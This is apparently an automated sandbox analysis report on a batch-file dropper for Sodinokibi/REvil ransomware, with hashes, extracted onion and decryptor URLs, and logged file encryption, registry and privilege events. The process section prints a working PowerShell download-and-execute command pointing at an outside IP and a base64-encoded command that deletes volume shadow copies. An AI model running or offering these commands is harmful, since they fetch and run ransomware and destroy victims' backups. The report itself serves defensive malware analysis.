Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows7_x64 -
resource
win7v191014 -
submitted
11-02-2020 19:10
Static task
static1
Behavioral task
behavioral1
Sample
hBjM939D.bat
Resource
win7v191014
Behavioral task
behavioral2
Sample
hBjM939D.bat
Resource
win10v191014
General
-
Target
hBjM939D.bat
-
Size
198B
-
MD5
31f14e4e5545659b2edf91aedb0830cb
-
SHA1
e5489bc5f3b8f118e6fb0ba7f5f4a0223a33863a
-
SHA256
2f3a2162c69c2185edadd4cc4d60b0ef9f2d212d2d710f30e012b9878aefc0f1
-
SHA512
80298267b14e688189cfefabed44496c5c22a51c50c788ac72ed1b9ad4ab1848068308f1a7990665ebba4220a428cdb7a1a5695a3643ea395af7566726914562
Malware Config
Extracted
http://185.103.242.78/pastes/hBjM939D
Extracted
C:\s0ks9v-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2F57540029B6714A
http://decryptor.cc/2F57540029B6714A
Signatures
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1356 powershell.exe Token: SeDebugPrivilege 1356 powershell.exe Token: SeDebugPrivilege 1900 powershell.exe Token: SeBackupPrivilege 1220 vssvc.exe Token: SeRestorePrivilege 1220 vssvc.exe Token: SeAuditPrivilege 1220 vssvc.exe -
Blacklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 7 1356 powershell.exe 12 1356 powershell.exe 14 1356 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Drops file in Program Files directory 33 IoCs
Processes:
powershell.exedescription ioc process File renamed C:\Program Files\ConvertFromGet.xla => \??\c:\program files\ConvertFromGet.xla.s0ks9v powershell.exe File opened for modification \??\c:\program files\ImportLimit.rm powershell.exe File opened for modification \??\c:\program files\ConvertFromGet.xla powershell.exe File opened for modification \??\c:\program files\PublishCopy.ppt powershell.exe File opened for modification \??\c:\program files\RegisterJoin.vsd powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\s0ks9v-readme.txt powershell.exe File renamed C:\Program Files\ConfirmUpdate.mpeg2 => \??\c:\program files\ConfirmUpdate.mpeg2.s0ks9v powershell.exe File renamed C:\Program Files\ImportLimit.rm => \??\c:\program files\ImportLimit.rm.s0ks9v powershell.exe File renamed C:\Program Files\PublishCopy.ppt => \??\c:\program files\PublishCopy.ppt.s0ks9v powershell.exe File renamed C:\Program Files\JoinMove.vbs => \??\c:\program files\JoinMove.vbs.s0ks9v powershell.exe File opened for modification \??\c:\program files\UnprotectWait.html powershell.exe File opened for modification \??\c:\program files\UnregisterEnable.ods powershell.exe File renamed C:\Program Files\UnprotectWait.html => \??\c:\program files\UnprotectWait.html.s0ks9v powershell.exe File created \??\c:\program files\s0ks9v-readme.txt powershell.exe File renamed C:\Program Files\PushFormat.jpe => \??\c:\program files\PushFormat.jpe.s0ks9v powershell.exe File renamed C:\Program Files\WaitDebug.mhtml => \??\c:\program files\WaitDebug.mhtml.s0ks9v powershell.exe File opened for modification \??\c:\program files\PushFormat.jpe powershell.exe File renamed C:\Program Files\UseSkip.xps => \??\c:\program files\UseSkip.xps.s0ks9v powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\s0ks9v-readme.txt powershell.exe File opened for modification \??\c:\program files\WaitDebug.mhtml powershell.exe File renamed C:\Program Files\DebugRevoke.txt => \??\c:\program files\DebugRevoke.txt.s0ks9v powershell.exe File created \??\c:\program files\microsoft sql server compact edition\s0ks9v-readme.txt powershell.exe File opened for modification \??\c:\program files\StepConnect.temp powershell.exe File renamed C:\Program Files\StepConnect.temp => \??\c:\program files\StepConnect.temp.s0ks9v powershell.exe File opened for modification \??\c:\program files\ConfirmUpdate.mpeg2 powershell.exe File opened for modification \??\c:\program files\MountBlock.xltx powershell.exe File renamed C:\Program Files\MountBlock.xltx => \??\c:\program files\MountBlock.xltx.s0ks9v powershell.exe File renamed C:\Program Files\UnregisterEnable.ods => \??\c:\program files\UnregisterEnable.ods.s0ks9v powershell.exe File opened for modification \??\c:\program files\DebugRevoke.txt powershell.exe File opened for modification \??\c:\program files\JoinMove.vbs powershell.exe File renamed C:\Program Files\RegisterJoin.vsd => \??\c:\program files\RegisterJoin.vsd.s0ks9v powershell.exe File opened for modification \??\c:\program files\UseSkip.xps powershell.exe File created \??\c:\program files (x86)\s0ks9v-readme.txt powershell.exe -
Processes:
powershell.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b0601050507030406082b0601050507030106082b0601050507030206082b06010505070308060a2b0601040182370a0304060a2b0601040182370a030c6200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4uve.bmp" powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1356 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1100 wrote to memory of 1356 1100 cmd.exe powershell.exe PID 1356 wrote to memory of 1900 1356 powershell.exe powershell.exe PID 1356 wrote to memory of 1900 1356 powershell.exe powershell.exe PID 1356 wrote to memory of 1900 1356 powershell.exe powershell.exe PID 1356 wrote to memory of 1900 1356 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1356 powershell.exe 1356 powershell.exe 1356 powershell.exe 1900 powershell.exe 1900 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality
-
Discovering connected drives 3 TTPs 7 IoCs
Processes:
powershell.execmd.exepowershell.exedescription ioc process File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\E: powershell.exe File opened (read-only) \??\C: cmd.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\A: powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\hBjM939D.bat"1⤵
- Suspicious use of WriteProcessMemory
- Discovering connected drives
PID:1100 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/hBjM939D');Invoke-MHYLWDFAYARXBSG;Start-Sleep -s 10000"2⤵
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Drops file in Program Files directory
- Modifies system certificate store
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Discovering connected drives
PID:1356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Discovering connected drives
PID:1900
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1220